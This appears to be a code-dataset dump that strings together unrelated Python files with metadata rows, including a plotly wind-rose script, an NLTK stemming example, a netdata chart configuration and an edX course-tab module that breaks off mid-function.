raise ValueError("Invalid Application ID")
if event['session']['new']:
on_session_started({'requestId': event['request']['requestId']},
event['session'])
if event['request']['type'] == "LaunchRequest":
return on_launch(event['request'], event['session'])
elif event['request']['type'] == "IntentRequest":
return on_intent(event['request'], event['session'])
elif event['request']['type'] == "SessionEndedRequest":
return on_session_ended(event['request'], event['session'])
| mit | 2,951,908,603,387,607,000 | 33.441358 | 145 | 0.631419 | false |
zrhans/pythonanywhere | pyscripts/ply_wrose.py | 1 | 1678 | """
DATA,Chuva,Chuva_min,Chuva_max,VVE,VVE_min,VVE_max,DVE,DVE_min,DVE_max,Temp.,Temp._min,Temp._max,Umidade,Umidade_min,Umidade_max,Rad.,Rad._min,Rad._max,Pres.Atm.,Pres.Atm._min,Pres.Atm._max,Temp.Int.,Temp.Int._min,Temp.Int._max,CH4,CH4_min,CH4_max,HCnM,HCnM_min,HCnM_max,HCT,HCT_min,HCT_max,SO2,SO2_min,SO2_max,O3,O3_min,O3_max,NO,NO_min,NO_max,NO2,NO2_min,NO2_max,NOx,NOx_min,NOx_max,CO,CO_min,CO_max,MP10,MP10_min,MP10_max,MPT,MPT_min,MPT_max,Fin,Fin_min,Fin_max,Vin,Vin_min,Vin_max,Vout,Vout_min,Vout_max
"""
import plotly.plotly as py # Every function in this module will communicate with an external plotly server
import plotly.graph_objs as go
import pandas as pd
DATAFILE = r'/home/zrhans/w3/bns/bns_2016-1.csv'
df = pd.read_csv(DATAFILE, parse_dates=True, sep=',', header=0, index_col='DATA')
x = df.DVE
y = df.VVE
#print(y)
# Definindo as series dedados
trace1 = go.Area(
r = y,#["2015-12-01","2015-12-01 01:00:00","2015-12-01 02:00:00","2015-12-01 03:00:00","2015-12-01 04:00:00","2015-12-01 05:00:00"],
t = x,#[74.73,76.59,76.5,79.03,77.89,81.9,],
name='Vento m/s',
marker=dict(
color='rgb(158,154,200)'
)
)
# Edit the layout
layout = go.Layout(
title='Distribuição da Velocidade do Vento no diagrama Laurel',
font = dict(size=16),
radialaxis=dict(
ticksuffix='m/s'
),
orientation=270
)
data = [trace1]
fig = go.Figure(data=data, layout=layout)
# Tracando o objeto
py.plot(
fig,
filename='hans/oi_wrose', # name of the file as saved in your plotly account
sharing='public'
) # 'public' | 'private' | 'secret': Learn more: https://plot.ly/python/privacy
| apache-2.0 | 3,732,984,452,064,682,000 | 32.52 | 507 | 0.665274 | false |
MingjunZhou/nltk_book | ch3_Processing_Raw_Text/normalizing_text.py | 1 | 1438 | import nltk
class IndexedText(object):
def __init__(self, stemmer, text):
self._text = text
self._stemmer = stemmer
self._index = nltk.Index((self._stem(word), i)
for (i, word) in enumerate(text))
def concordance(self, word, width=40):
key = self._stem(word)
wc = width / 4 # words of context
for i in self._index[key]:
lcontext = ' '.join(self._text[i-wc:i])
rcontext = ' '.join(self._text[i:i+wc])
ldisplay = '%*s' % (width, lcontext[-width:])
rdisplay = '%-*s' % (width, rcontext[:width])
print ldisplay, rdisplay
def _stem(self, word):
return self._stemmer.stem(word).lower()
if __name__ == "__main__":
raw = """DENNIS: Listen, strange women lying in ponds distributing swords
is no basis for a system of government. Supreme executive power derives from
a mandate from the masses, not from some farcical aquatic ceremony."""
tokens = nltk.word_tokenize(raw)
porter = nltk.PorterStemmer()
lancaster = nltk.LancasterStemmer()
print [porter.stem(t) for t in tokens]
print [lancaster.stem(t) for t in tokens]
grail = nltk.corpus.webtext.words('grail.txt')
text = IndexedText(porter, grail)
text.concordance('lie')
# lemmatization
wnl = nltk.WordNetLemmatizer()
print [wnl.lemmatize(t) for t in tokens]
| bsd-3-clause | 3,717,364,423,540,974,000 | 34.073171 | 85 | 0.595967 | false |
3cky/netdata | collectors/python.d.plugin/ssg_nodes/ssg_nodes.chart.py | 1 | 4025 | import json
from third_party.osgi_monitor import OsgiMonitorService
# default module values (can be overridden per job in `config`)
update_every = 10
priority = 60000
retries = 60
ORDER = ['datasource.pool', 'datasource.perf', 'conn.service', 'conn.auth', 'auth.service', \
'game.tables', 'game.authz', 'game.pool', 'game.perf', \
'tournament.pool', 'tournament.perf']
CHARTS = {
'datasource.pool': {
'options': [None, 'Connections', 'connections', 'DataSource (pool)', 'ssg.datasource.pool', 'area'],
'lines': [
['datasource.pool.busy', 'busy'],
['datasource.pool.size', 'size'],
['datasource.pool.total', 'pooled']
]},
'datasource.perf': {
'options': [None, 'Connections/s', 'connections/s', 'DataSource (perf)', 'ssg.datasource.perf', 'area'],
'lines': [
['datasource.pool.picked', 'conn/s', 'incremental']
]},
'conn.service': {
'options': [None, 'Connections', 'connections', 'Connections (all)', 'ssg.conn.service', 'area'],
'lines': [
['connection.number.total', 'total'],
['connection.number.local', 'local']
]},
'conn.auth': {
'options': [None, 'Connections', 'connections', 'Connections (auth)', 'ssg.conn.auth', 'area'],
'lines': [
['offline.user.registry.size', 'offline'],
['auth.user.registry.size', 'total'],
['local.auth.user.registry.size', 'local']
]},
'auth.service': {
'options': [None, 'Authenticated', 'authenticated', 'Authentication', 'ssg.auth.service', 'area'],
'lines': [
['auth.session.number', 'sessions'],
['auth.user.number', 'users']
]},
'game.tables': {
'options': [None, 'Tables', 'tables', 'Game (tables)', 'ssg.game.tables', 'area'],
'lines': [
['game.service.tables.local.active', 'active'],
['game.service.tables.total', 'total'],
['game.service.tables.local.total', 'local']
]},
'game.authz': {
'options': [None, 'Participants', 'participants', 'Game (authz)', 'ssg.game.authz', 'area'],
'lines': [
['game.service.authz.active', 'active'],
['game.service.authz.total', 'total'],
['game.service.authz.active.m_1', 'battleship'],
['game.service.authz.active.m_2', 'checkers'],
['game.service.authz.active.m_5', 'durak'],
['game.service.authz.active.m_6', 'chess'],
['game.service.authz.active.m_9', 'gammon'],
['game.service.authz.active.m_11', 'poker'],
['game.service.authz.active.m_14', 'thousand'],
['game.service.authz.active.m_15', 'burkozel']
]},
'game.pool': {
'options': [None, 'Threads', 'threads', 'Game (pool)', 'ssg.game.pool', 'area'],
'lines': [
['game.service.pool.size', 'size'],
['game.service.pool.load.avg5min', 'avg5min', 'absolute', 1, 1000]
]},
'game.perf': {
'options': [None, 'Tasks/s', 'tasks/s', 'Game (perf)', 'ssg.game.perf', 'area'],
'lines': [
['game.service.pool.tasks.complete', 'tasks/s', 'incremental']
]},
'tournament.pool': {
'options': [None, 'Threads', 'threads', 'Tournament (pool)', 'ssg.tournament.pool', 'area'],
'lines': [
['tournaments.pool.size', 'size'],
['tournaments.pool.load.avg5min', 'avg5min', 'absolute', 1, 1000]
]},
'tournament.perf': {
'options': [None, 'Tasks/s', 'tasks/s', 'Tournament (perf)', 'ssg.tournament.perf', 'area'],
'lines': [
['tournaments.pool.tasks.complete', 'tasks/s', 'incremental']
]},
}
class Service(OsgiMonitorService):
def __init__(self, configuration=None, name=None):
OsgiMonitorService.__init__(self, configuration=configuration, name=name)
self.order = ORDER
self.definitions = CHARTS
| gpl-3.0 | 4,366,254,782,513,067,000 | 40.927083 | 112 | 0.541366 | false |
nttks/jenkins-test | common/lib/xmodule/xmodule/tabs.py | 1 | 35344 | """
Implement CourseTab
"""
# pylint: disable=incomplete-protocol
# Note: pylint complains that we do not implement __delitem__ and __len__, although we implement __setitem__
# and __getitem__. However, the former two do not apply to the CourseTab class so we do not implement them.
# The reason we implement the latter two is to enable callers to continue to use the CourseTab object with
# dict-type accessors.
from abc import ABCMeta, abstractmethod
from xblock.fields import List
# We should only scrape strings for i18n in this file, since the target language is known only when
# they are rendered in the template. So ugettext gets called in the template.
_ = lambda text: text
class CourseTab(object): # pylint: disable=incomplete-protocol
"""
The Course Tab class is a data abstraction for all tabs (i.e., course navigation links) within a course.
It is an abstract class - to be inherited by various tab types.
Derived classes are expected to override methods as needed.
When a new tab class is created, it should define the type and add it in this class' factory method.
"""
__metaclass__ = ABCMeta
# Class property that specifies the type of the tab. It is generally a constant value for a
# subclass, shared by all instances of the subclass.
type = ''
icon = ''
# Class property that specifies whether the tab can be hidden for a particular course
is_hideable = False
# Class property that specifies whether the tab can be moved within a course's list of tabs
is_movable = True
# Class property that specifies whether the tab is a collection of other tabs
is_collection = False
def __init__(self, name, tab_id, link_func):
"""
Initializes class members with values passed in by subclasses.
Args:
name: The name of the tab
tab_id: Intended to be a unique id for this tab, although it is currently not enforced
within this module. It is used by the UI to determine which page is active.
link_func: A function that computes the link for the tab,
given the course and a reverse-url function as input parameters
"""
self.name = name
self.tab_id = tab_id
self.link_func = link_func
def can_display(self, course, settings, is_user_authenticated, is_user_staff, is_user_enrolled): # pylint: disable=unused-argument
"""
Determines whether the tab should be displayed in the UI for the given course and a particular user.
This method is to be overridden by subclasses when applicable. The base class implementation
always returns True.
Args:
course: An xModule CourseDescriptor
settings: The configuration settings, including values for:
WIKI_ENABLED
FEATURES['ENABLE_DISCUSSION_SERVICE']
FEATURES['ENABLE_EDXNOTES']
FEATURES['ENABLE_STUDENT_NOTES']
FEATURES['ENABLE_TEXTBOOK']
is_user_authenticated: Indicates whether the user is authenticated. If the tab is of
type AuthenticatedCourseTab and this value is False, then can_display will return False.
is_user_staff: Indicates whether the user has staff access to the course. If the tab is of
type StaffTab and this value is False, then can_display will return False.
is_user_enrolled: Indicates whether the user is enrolled in the course
Returns:
A boolean value to indicate whether this instance of the tab should be displayed to a
given user for the given course.
"""
return True
def get(self, key, default=None):
"""
Akin to the get method on Python dictionary objects, gracefully returns the value associated with the
given key, or the default if key does not exist.
"""
try:
return self[key]
except KeyError:
return default
def __getitem__(self, key):
"""
This method allows callers to access CourseTab members with the d[key] syntax as is done with
Python dictionary objects.
"""
if key == 'name':
return self.name
elif key == 'type':
return self.type
elif key == 'tab_id':
return self.tab_id
else:
raise KeyError('Key {0} not present in tab {1}'.format(key, self.to_json()))
def __setitem__(self, key, value):
"""
This method allows callers to change CourseTab members with the d[key]=value syntax as is done with
Python dictionary objects. For example: course_tab['name'] = new_name
Note: the 'type' member can be 'get', but not 'set'.
"""
if key == 'name':
self.name = value
elif key == 'tab_id':
self.tab_id = value
else:
raise KeyError('Key {0} cannot be set in tab {1}'.format(key, self.to_json()))
def __eq__(self, other):
"""
Overrides the equal operator to check equality of member variables rather than the object's address.
Also allows comparison with dict-type tabs (needed to support callers implemented before this class
was implemented).
"""
if type(other) is dict and not self.validate(other, raise_error=False):
# 'other' is a dict-type tab and did not validate
return False
# allow tabs without names; if a name is required, its presence was checked in the validator.
name_is_eq = (other.get('name') is None or self.name == other['name'])
# only compare the persisted/serialized members: 'type' and 'name'
return self.type == other.get('type') and name_is_eq
def __ne__(self, other):
"""
Overrides the not equal operator as a partner to the equal operator.
"""
return not (self == other)
@classmethod
def validate(cls, tab_dict, raise_error=True):
"""
Validates the given dict-type tab object to ensure it contains the expected keys.
This method should be overridden by subclasses that require certain keys to be persisted in the tab.
"""
return key_checker(['type'])(tab_dict, raise_error)
def to_json(self):
"""
Serializes the necessary members of the CourseTab object to a json-serializable representation.
This method is overridden by subclasses that have more members to serialize.
Returns:
a dictionary with keys for the properties of the CourseTab object.
"""
return {'type': self.type, 'name': self.name}
@staticmethod
def from_json(tab_dict):
"""
Deserializes a CourseTab from a json-like representation.
The subclass that is instantiated is determined by the value of the 'type' key in the
given dict-type tab. The given dict-type tab is validated before instantiating the CourseTab object.
Args:
tab: a dictionary with keys for the properties of the tab.
Raises:
InvalidTabsException if the given tab doesn't have the right keys.
"""
sub_class_types = {
'courseware': CoursewareTab,
'course_info': CourseInfoTab,
'wiki': WikiTab,
'discussion': DiscussionTab,
'external_discussion': ExternalDiscussionTab,
'external_link': ExternalLinkTab,
'textbooks': TextbookTabs,
'pdf_textbooks': PDFTextbookTabs,
'html_textbooks': HtmlTextbookTabs,
'progress': ProgressTab,
'static_tab': StaticTab,
'peer_grading': PeerGradingTab,
'staff_grading': StaffGradingTab,
'open_ended': OpenEndedGradingTab,
'notes': NotesTab,
'edxnotes': EdxNotesTab,
'syllabus': SyllabusTab,
'instructor': InstructorTab, # not persisted
}
tab_type = tab_dict.get('type')
if tab_type not in sub_class_types:
raise InvalidTabsException(
'Unknown tab type {0}. Known types: {1}'.format(tab_type, sub_class_types)
)
tab_class = sub_class_types[tab_dict['type']]
tab_class.validate(tab_dict)
return tab_class(tab_dict=tab_dict)
class AuthenticatedCourseTab(CourseTab):
"""
Abstract class for tabs that can be accessed by only authenticated users.
"""
def can_display(self, course, settings, is_user_authenticated, is_user_staff, is_user_enrolled):
return is_user_authenticated
class StaffTab(AuthenticatedCourseTab):
"""
Abstract class for tabs that can be accessed by only users with staff access.
"""
def can_display(self, course, settings, is_user_authenticated, is_user_staff, is_user_enrolled): # pylint: disable=unused-argument
return is_user_staff
class EnrolledOrStaffTab(CourseTab):
"""
Abstract class for tabs that can be accessed by only users with staff access
or users enrolled in the course.
"""
def can_display(self, course, settings, is_user_authenticated, is_user_staff, is_user_enrolled): # pylint: disable=unused-argument
return is_user_authenticated and (is_user_staff or is_user_enrolled)
class HideableTab(CourseTab):
"""
Abstract class for tabs that are hideable
"""
is_hideable = True
def __init__(self, name, tab_id, link_func, tab_dict):
super(HideableTab, self).__init__(
name=name,
tab_id=tab_id,
link_func=link_func,
)
self.is_hidden = tab_dict.get('is_hidden', False) if tab_dict else False
def __getitem__(self, key):
if key == 'is_hidden':
return self.is_hidden
else:
return super(HideableTab, self).__getitem__(key)
def __setitem__(self, key, value):
if key == 'is_hidden':
self.is_hidden = value
else:
super(HideableTab, self).__setitem__(key, value)
def to_json(self):
to_json_val = super(HideableTab, self).to_json()
if self.is_hidden:
to_json_val.update({'is_hidden': True})
return to_json_val
def __eq__(self, other):
if not super(HideableTab, self).__eq__(other):
return False
return self.is_hidden == other.get('is_hidden', False)
class CoursewareTab(EnrolledOrStaffTab):
"""
A tab containing the course content.
"""
type = 'courseware'
icon = 'fa fa-edit'
is_movable = False
def __init__(self, tab_dict=None): # pylint: disable=unused-argument
super(CoursewareTab, self).__init__(
# Translators: 'Courseware' refers to the tab in the courseware that leads to the content of a course
name=_('Courseware'), # support fixed name for the courseware tab
tab_id=self.type,
link_func=link_reverse_func(self.type),
)
class CourseInfoTab(CourseTab):
"""
A tab containing information about the course.
"""
type = 'course_info'
icon = 'fa fa-info-circle'
is_movable = False
def __init__(self, tab_dict=None):
super(CourseInfoTab, self).__init__(
# Translators: "Course Info" is the name of the course's information and updates page
name=tab_dict['name'] if tab_dict else _('Course Info'),
tab_id='info',
link_func=link_reverse_func('info'),
)
@classmethod
def validate(cls, tab_dict, raise_error=True):
return super(CourseInfoTab, cls).validate(tab_dict, raise_error) and need_name(tab_dict, raise_error)
class ProgressTab(EnrolledOrStaffTab):
"""
A tab containing information about the authenticated user's progress.
"""
type = 'progress'
icon = 'fa fa-bar-chart'
def __init__(self, tab_dict=None):
super(ProgressTab, self).__init__(
# Translators: "Progress" is the name of the student's course progress page
name=tab_dict['name'] if tab_dict else _('Progress'),
tab_id=self.type,
link_func=link_reverse_func(self.type),
)
def can_display(self, course, settings, is_user_authenticated, is_user_staff, is_user_enrolled):
super_can_display = super(ProgressTab, self).can_display(
course, settings, is_user_authenticated, is_user_staff, is_user_enrolled
)
return super_can_display and not course.hide_progress_tab
@classmethod
def validate(cls, tab_dict, raise_error=True):
return super(ProgressTab, cls).validate(tab_dict, raise_error) and need_name(tab_dict, raise_error)
class WikiTab(HideableTab):
"""
A tab_dict containing the course wiki.
"""
type = 'wiki'
icon = 'fa fa-comment'
def __init__(self, tab_dict=None):
super(WikiTab, self).__init__(
# Translators: "Wiki" is the name of the course's wiki page
name=tab_dict['name'] if tab_dict else _('Wiki'),
tab_id=self.type,
link_func=link_reverse_func('course_wiki'),
tab_dict=tab_dict,
)
def can_display(self, course, settings, is_user_authenticated, is_user_staff, is_user_enrolled):
return settings.WIKI_ENABLED and (
course.allow_public_wiki_access or is_user_enrolled or is_user_staff
)
@classmethod
def validate(cls, tab_dict, raise_error=True):
return super(WikiTab, cls).validate(tab_dict, raise_error) and need_name(tab_dict, raise_error)
class DiscussionTab(EnrolledOrStaffTab):
"""
A tab only for the new Berkeley discussion forums.
"""
type = 'discussion'
icon = 'fa fa-comments'
def __init__(self, tab_dict=None):
super(DiscussionTab, self).__init__(
# Translators: "Discussion" is the title of the course forum page
name=tab_dict['name'] if tab_dict else _('Discussion'),
tab_id=self.type,
link_func=link_reverse_func('django_comment_client.forum.views.forum_form_discussion'),
)
def can_display(self, course, settings, is_user_authenticated, is_user_staff, is_user_enrolled):
super_can_display = super(DiscussionTab, self).can_display(
course, settings, is_user_authenticated, is_user_staff, is_user_enrolled
)
return settings.FEATURES.get('ENABLE_DISCUSSION_SERVICE') and super_can_display
@classmethod
def validate(cls, tab_dict, raise_error=True):
return super(DiscussionTab, cls).validate(tab_dict, raise_error) and need_name(tab_dict, raise_error)
class LinkTab(CourseTab):
"""
Abstract class for tabs that contain external links.
"""
link_value = ''
def __init__(self, name, tab_id, link_value):
self.link_value = link_value
super(LinkTab, self).__init__(
name=name,
tab_id=tab_id,
link_func=link_value_func(self.link_value),
)
def __getitem__(self, key):
if key == 'link':
return self.link_value
else:
return super(LinkTab, self).__getitem__(key)
def __setitem__(self, key, value):
if key == 'link':
self.link_value = value
else:
super(LinkTab, self).__setitem__(key, value)
def to_json(self):
to_json_val = super(LinkTab, self).to_json()
to_json_val.update({'link': self.link_value})
return to_json_val
def __eq__(self, other):
if not super(LinkTab, self).__eq__(other):
return False
return self.link_value == other.get('link')
@classmethod
def validate(cls, tab_dict, raise_error=True):
return super(LinkTab, cls).validate(tab_dict, raise_error) and key_checker(['link'])(tab_dict, raise_error)
class ExternalDiscussionTab(LinkTab):
"""
A tab that links to an external discussion service.
"""
type = 'external_discussion'
icon = 'fa fa-question-circle'
def __init__(self, tab_dict=None, link_value=None):
super(ExternalDiscussionTab, self).__init__(
# Translators: 'Discussion' refers to the tab in the courseware that leads to the discussion forums
name=_('Discussion'),
tab_id='discussion',
link_value=tab_dict['link'] if tab_dict else link_value,
)
class ExternalLinkTab(LinkTab):
"""
A tab containing an external link.
"""
type = 'external_link'
icon = 'fa fa-question-circle'
def __init__(self, tab_dict):
super(ExternalLinkTab, self).__init__(
name=tab_dict['name'],
tab_id=None, # External links are never active.
link_value=tab_dict['link'],
)
class StaticTab(CourseTab):
"""
A custom tab.
"""
type = 'static_tab'
icon = 'fa fa-circle'
@classmethod
def validate(cls, tab_dict, raise_error=True):
return super(StaticTab, cls).validate(tab_dict, raise_error) and key_checker(['name', 'url_slug'])(tab_dict, raise_error)
def __init__(self, tab_dict=None, name=None, url_slug=None):
self.url_slug = tab_dict['url_slug'] if tab_dict else url_slug
super(StaticTab, self).__init__(
name=tab_dict['name'] if tab_dict else name,
tab_id='static_tab_{0}'.format(self.url_slug),
link_func=lambda course, reverse_func: reverse_func(self.type, args=[course.id.to_deprecated_string(), self.url_slug]),
)
def __getitem__(self, key):
if key == 'url_slug':
return self.url_slug
else:
return super(StaticTab, self).__getitem__(key)
def __setitem__(self, key, value):
if key == 'url_slug':
self.url_slug = value
else:
super(StaticTab, self).__setitem__(key, value)
def to_json(self):
to_json_val = super(StaticTab, self).to_json()
to_json_val.update({'url_slug': self.url_slug})
return to_json_val
def __eq__(self, other):
if not super(StaticTab, self).__eq__(other):
return False
return self.url_slug == other.get('url_slug')
class SingleTextbookTab(CourseTab):
"""
A tab representing a single textbook. It is created temporarily when enumerating all textbooks within a
Textbook collection tab. It should not be serialized or persisted.
"""
type = 'single_textbook'
icon = 'fa fa-book'
is_movable = False
is_collection_item = True
def to_json(self):
raise NotImplementedError('SingleTextbookTab should not be serialized.')
class TextbookTabsBase(AuthenticatedCourseTab):
"""
Abstract class for textbook collection tabs classes.
"""
is_collection = True
def __init__(self, tab_id):
# Translators: 'Textbooks' refers to the tab in the course that leads to the course' textbooks
super(TextbookTabsBase, self).__init__(
name=_("Textbooks"),
tab_id=tab_id,
link_func=None,
)
@abstractmethod
def items(self, course):
"""
A generator for iterating through all the SingleTextbookTab book objects associated with this
collection of textbooks.
"""
pass
class TextbookTabs(TextbookTabsBase):
"""
A tab representing the collection of all textbook tabs.
"""
type = 'textbooks'
icon = 'fa fa-book'
def __init__(self, tab_dict=None): # pylint: disable=unused-argument
super(TextbookTabs, self).__init__(
tab_id=self.type,
)
def can_display(self, course, settings, is_user_authenticated, is_user_staff, is_user_enrolled):
return settings.FEATURES.get('ENABLE_TEXTBOOK')
def items(self, course):
for index, textbook in enumerate(course.textbooks):
yield SingleTextbookTab(
name=textbook.title,
tab_id='textbook/{0}'.format(index),
link_func=lambda course, reverse_func, index=index: reverse_func(
'book', args=[course.id.to_deprecated_string(), index]
),
)
class PDFTextbookTabs(TextbookTabsBase):
"""
A tab representing the collection of all PDF textbook tabs.
"""
type = 'pdf_textbooks'
icon = 'fa fa-book'
def __init__(self, tab_dict=None): # pylint: disable=unused-argument
super(PDFTextbookTabs, self).__init__(
tab_id=self.type,
)
def items(self, course):
for index, textbook in enumerate(course.pdf_textbooks):
yield SingleTextbookTab(
name=textbook['tab_title'],
tab_id='pdftextbook/{0}'.format(index),
link_func=lambda course, reverse_func, index=index: reverse_func(
'pdf_book', args=[course.id.to_deprecated_string(), index]
),
)
class HtmlTextbookTabs(TextbookTabsBase):
"""
A tab representing the collection of all Html textbook tabs.
"""
type = 'html_textbooks'
icon = 'fa fa-book'
def __init__(self, tab_dict=None): # pylint: disable=unused-argument
super(HtmlTextbookTabs, self).__init__(
tab_id=self.type,
)
def items(self, course):
for index, textbook in enumerate(course.html_textbooks):
yield SingleTextbookTab(
name=textbook['tab_title'],
tab_id='htmltextbook/{0}'.format(index),
link_func=lambda course, reverse_func, index=index: reverse_func(
'html_book', args=[course.id.to_deprecated_string(), index]
),
)
class GradingTab(object):
"""
Abstract class for tabs that involve Grading.
"""
pass
class StaffGradingTab(StaffTab, GradingTab):
"""
A tab for staff grading.
"""
type = 'staff_grading'
icon = 'fa fa-check-square-o'
def __init__(self, tab_dict=None): # pylint: disable=unused-argument
super(StaffGradingTab, self).__init__(
# Translators: "Staff grading" appears on a tab that allows
# staff to view open-ended problems that require staff grading
name=_("Staff grading"),
tab_id=self.type,
link_func=link_reverse_func(self.type),
)
class PeerGradingTab(AuthenticatedCourseTab, GradingTab):
"""
A tab for peer grading.
"""
type = 'peer_grading'
icon = 'fa fa-check-square-o'
def __init__(self, tab_dict=None): # pylint: disable=unused-argument
super(PeerGradingTab, self).__init__(
# Translators: "Peer grading" appears on a tab that allows
# students to view open-ended problems that require grading
name=_("Peer grading"),
tab_id=self.type,
link_func=link_reverse_func(self.type),
)
class OpenEndedGradingTab(AuthenticatedCourseTab, GradingTab):
"""
A tab for open ended grading.
"""
type = 'open_ended'
icon = 'fa fa-check-square-o'
def __init__(self, tab_dict=None): # pylint: disable=unused-argument
super(OpenEndedGradingTab, self).__init__(
# Translators: "Open Ended Panel" appears on a tab that, when clicked, opens up a panel that
# displays information about open-ended problems that a user has submitted or needs to grade
name=_("Open Ended Panel"),
tab_id=self.type,
link_func=link_reverse_func('open_ended_notifications'),
)
class SyllabusTab(CourseTab):
"""
A tab for the course syllabus.
"""
type = 'syllabus'
icon = 'fa fa-list-alt'
def can_display(self, course, settings, is_user_authenticated, is_user_staff, is_user_enrolled):
return hasattr(course, 'syllabus_present') and course.syllabus_present
def __init__(self, tab_dict=None): # pylint: disable=unused-argument
super(SyllabusTab, self).__init__(
# Translators: "Syllabus" appears on a tab that, when clicked, opens the syllabus of the course.
name=_('Syllabus'),
tab_id=self.type,
link_func=link_reverse_func(self.type),
)
class NotesTab(AuthenticatedCourseTab):
"""
A tab for the course notes.
"""
type = 'notes'
icon = 'fa fa-file-text'
def can_display(self, course, settings, is_user_authenticated, is_user_staff, is_user_enrolled):
return settings.FEATURES.get('ENABLE_STUDENT_NOTES')
def __init__(self, tab_dict=None):
super(NotesTab, self).__init__(
name=tab_dict['name'],
tab_id=self.type,
link_func=link_reverse_func(self.type),
)
@classmethod
def validate(cls, tab_dict, raise_error=True):
return super(NotesTab, cls).validate(tab_dict, raise_error) and need_name(tab_dict, raise_error)
class EdxNotesTab(AuthenticatedCourseTab):
"""
A tab for the course student notes.
"""
type = 'edxnotes'
icon = 'fa fa-file-text'
def can_display(self, course, settings, is_user_authenticated, is_user_staff, is_user_enrolled):
return settings.FEATURES.get('ENABLE_EDXNOTES')
def __init__(self, tab_dict=None):
super(EdxNotesTab, self).__init__(
name=tab_dict['name'] if tab_dict else _('Notes'),
tab_id=self.type,
link_func=link_reverse_func(self.type),
)
@classmethod
def validate(cls, tab_dict, raise_error=True):
return super(EdxNotesTab, cls).validate(tab_dict, raise_error) and need_name(tab_dict, raise_error)
class InstructorTab(StaffTab):
"""
A tab for the course instructors.
"""
type = 'instructor'
icon = 'fa fa-gears'
def __init__(self, tab_dict=None): # pylint: disable=unused-argument
super(InstructorTab, self).__init__(
# Translators: 'Instructor' appears on the tab that leads to the instructor dashboard, which is
# a portal where an instructor can get data and perform various actions on their course
name=_('Instructor'),
tab_id=self.type,
link_func=link_reverse_func('instructor_dashboard'),
)
class CourseTabList(List):
"""
An XBlock field class that encapsulates a collection of Tabs in a course.
It is automatically created and can be retrieved through a CourseDescriptor object: course.tabs
"""
@staticmethod
def initialize_default(course):
"""
An explicit initialize method is used to set the default values, rather than implementing an
__init__ method. This is because the default values are dependent on other information from
within the course.
"""
course.tabs.extend([
CoursewareTab(),
CourseInfoTab(),
])
# Presence of syllabus tab is indicated by a course attribute
if hasattr(course, 'syllabus_present') and course.syllabus_present:
course.tabs.append(SyllabusTab())
# If the course has a discussion link specified, use that even if we feature
# flag discussions off. Disabling that is mostly a server safety feature
# at this point, and we don't need to worry about external sites.
if course.discussion_link:
discussion_tab = ExternalDiscussionTab(link_value=course.discussion_link)
else:
discussion_tab = DiscussionTab()
course.tabs.extend([
TextbookTabs(),
discussion_tab,
WikiTab(),
ProgressTab(),
])
@staticmethod
def get_discussion(course):
"""
Returns the discussion tab for the given course. It can be either of type DiscussionTab
or ExternalDiscussionTab. The returned tab object is self-aware of the 'link' that it corresponds to.
"""
# the discussion_link setting overrides everything else, even if there is a discussion tab in the course tabs
if course.discussion_link:
return ExternalDiscussionTab(link_value=course.discussion_link)
# find one of the discussion tab types in the course tabs
for tab in course.tabs:
if isinstance(tab, DiscussionTab) or isinstance(tab, ExternalDiscussionTab):
return tab
return None
@staticmethod
def get_tab_by_slug(tab_list, url_slug):
"""
Look for a tab with the specified 'url_slug'. Returns the tab or None if not found.
"""
return next((tab for tab in tab_list if tab.get('url_slug') == url_slug), None)
@staticmethod
def get_tab_by_type(tab_list, tab_type):
"""
Look for a tab with the specified type. Returns the first matching tab.
"""
return next((tab for tab in tab_list if tab.type == tab_type), None)
@staticmethod
def get_tab_by_id(tab_list, tab_id):
"""
Look for a tab with the specified tab_id. Returns the first matching tab.
"""
return next((tab for tab in tab_list if tab.tab_id == tab_id), None)
@staticmethod
def iterate_displayable(
course,
settings,
is_user_authenticated=True,
is_user_staff=True,
is_user_enrolled=False
):
"""
Generator method for iterating through all tabs that can be displayed for the given course and
the given user with the provided access settings.
"""
for tab in course.tabs:
if tab.can_display(
course, settings, is_user_authenticated, is_user_staff, is_user_enrolled
) and (not tab.is_hideable or not tab.is_hidden):
if tab.is_collection:
for item in tab.items(course):
yield item
else:
yield tab
instructor_tab = InstructorTab()
if instructor_tab.can_display(course, settings, is_user_authenticated, is_user_staff, is_user_enrolled):
yield instructor_tab
@staticmethod
def iterate_displayable_cms(
course,
settings
):
"""
Generator method for iterating through all tabs that can be displayed for the given course
with the provided settings.
"""
for tab in course.tabs:
if tab.can_display(course, settings, is_user_authenticated=True, is_user_staff=True, is_user_enrolled=True):
if tab.is_collection and not len(list(tab.items(course))):
# do not yield collections that have no items
continue
yield tab
@classmethod
def validate_tabs(cls, tabs):
"""
Check that the tabs set for the specified course is valid. If it
isn't, raise InvalidTabsException with the complaint.
Specific rules checked:
- if no tabs specified, that's fine
- if tabs specified, first two must have type 'courseware' and 'course_info', in that order.
"""
if tabs is None or len(tabs) == 0:
return
if len(tabs) < 2:
raise InvalidTabsException("Expected at least two tabs. tabs: '{0}'".format(tabs))
if tabs[0].get('type') != CoursewareTab.type:
raise InvalidTabsException(
"Expected first tab to have type 'courseware'. tabs: '{0}'".format(tabs))
if tabs[1].get('type') != CourseInfoTab.type:
raise InvalidTabsException(
"Expected second tab to have type 'course_info'. tabs: '{0}'".format(tabs))
# the following tabs should appear only once
for tab_type in [
CoursewareTab.type,
CourseInfoTab.type,
NotesTab.type,
TextbookTabs.type,
PDFTextbookTabs.type,
HtmlTextbookTabs.type,
EdxNotesTab.type]:
cls._validate_num_tabs_of_type(tabs, tab_type, 1)
@staticmethod
def _validate_num_tabs_of_type(tabs, tab_type, max_num):
"""
Check that the number of times that the given 'tab_type' appears in 'tabs' is less than or equal to 'max_num'.
"""
count = sum(1 for tab in tabs if tab.get('type') == tab_type)
if count > max_num:
msg = (
"Tab of type '{type}' appears {count} time(s). "
"Expected maximum of {max} time(s)."
).format(
type=tab_type, count=count, max=max_num,
)
raise InvalidTabsException(msg)
def to_json(self, values):
"""
Overrides the to_json method to serialize all the CourseTab objects to a json-serializable representation.
"""
json_data = []
if values:
for val in values:
if isinstance(val, CourseTab):
json_data.append(val.to_json())
elif isinstance(val, dict):
json_data.append(val)
else:
continue
return json_data
def from_json(self, values):
"""
Overrides the from_json method to de-serialize the CourseTab objects from a json-like representation.
"""
self.validate_tabs(values)
return [CourseTab.from_json(tab_dict) for tab_dict in values]
#### Link Functions
def link_reverse_func(reverse_name):
"""
Returns a function that takes in a course and reverse_url_func,
and calls the reverse_url_func with the given reverse_name and course' ID.
"""
return lambda course, reverse_url_func: reverse_url_func(reverse_name, args=[course.id.to_deprecated_string()])
def link_value_func(value):
"""
